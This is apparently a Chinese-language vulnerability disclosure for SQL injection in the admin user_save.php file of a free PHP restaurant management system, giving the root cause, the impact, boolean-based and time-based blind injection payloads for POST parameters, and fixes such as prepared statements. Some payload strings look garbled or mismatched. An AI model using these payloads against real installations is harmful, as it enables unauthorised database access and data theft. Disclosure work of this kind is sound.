关键漏洞信息 受影响的产品 产品名称: Restaurant Management System System V1.0 供应商主页: https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/ 受影响文件: /admin/user_save.php 版本: V1.0 漏洞类型 类型: SQL注入 根因 由于对 参数的用户输入验证不足,导致SQL注入漏洞。攻击者可以注入恶意代码并直接在SQL查询中使用,从而操纵SQL查询和执行未经授权的操作。 影响 攻击者可以利用此SQL注入漏洞实现未经授权的数据库访问、敏感数据泄露、数据篡改、系统控制中断,甚至服务中断,严重威胁系统安全和业务连续性。 描述 在对“Restaurant Management System System”项目的安全审查中,发现 文件中存在关键的SQL注入漏洞。该漏洞源于对 参数的用户输入验证不足,允许攻击者注入恶意SQL查询。因此,攻击者可以获得未经授权的数据库访问权限,修改或删除数据,并访问敏感信息。需要立即采取补救措施以确保系统安全和保护数据完整性。 漏洞细节和POC 易受攻击的参数: Payload: - 参数: username (POST) - 类型: MySQL BLIND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause - Payload: name=1&password=1' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT CONCAT(0x7e,DB_NAME(),0x7e)),1,1))>126) THEN 1 ELSE 0x28 END) AND 'Aqtv'='Aqtv - 类型: time-based blind - Payload: name=1&password=1' AND (SELECT SLEEP(5))John' AND 'tyTh'='tyTh - 参数: name (POST) - 类型: boolean-based blind - Payload: name=1' AND (SELECT CASE WHEN (2307=2307) THEN 1 ELSE 0x28 END) AND 'nDzou'='nDzousername=&password=1 - 类型: time-based blind - Payload: name=1' AND (SELECT SLEEP(5))Ezyg' AND 'DKUd'='DKUd 建议修复 1. 使用预编译语句和参数绑定。 2. 输入验证和过滤。 3. 最小化数据库用户权限。 4. 定期进行安全审计。